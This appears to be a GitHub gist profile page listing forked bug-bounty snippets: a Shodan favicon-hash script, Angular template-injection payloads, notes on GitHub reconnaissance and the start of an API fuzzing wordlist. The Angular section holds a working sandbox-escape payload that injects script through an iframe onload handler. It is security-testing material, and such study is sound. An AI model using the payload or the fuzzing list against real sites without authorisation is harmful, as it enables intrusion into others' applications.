Skip to content

Instantly share code, notes, and snippets.

View Infinical1's full-sized avatar

Infinical1

1 follower · 1 following
View GitHub Profile
@Infinical1
Infinical1 / get-shodan-favicon-hash.py
Created July 6, 2020 02:45 — forked from yehgdotnet/get-shodan-favicon-hash.py
Get Shodan FAVICON Hash
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@Infinical1
Infinical1 / AngularTI.md
Created February 22, 2020 07:49 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@Infinical1
Infinical1 / github_onplatform.md
Created February 20, 2020 19:01 — forked from EdOverflow/github_onplatform.md
My basic workflow when using GitHub for recon purposes.

On-platform GitHub Reconnaissance

Note: Please keep in mind, that all of this does not work if you are not signed in to GitHub.

When searching for issues related to a target I often like to quickly look up their GitHub organization on Google.

So let's say Gratipay says nothing about being open source. A quick Google "Gratipay GitHub" should return Gratipay's org page on GitHub.

Then from there I am going to check what repos actually belong to the org and which are forked. You can do this by selecting the Type: dropdown on the right hand side of the page.

@Infinical1
Infinical1 / List of API endpoints & objects
Created November 14, 2019 02:01 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000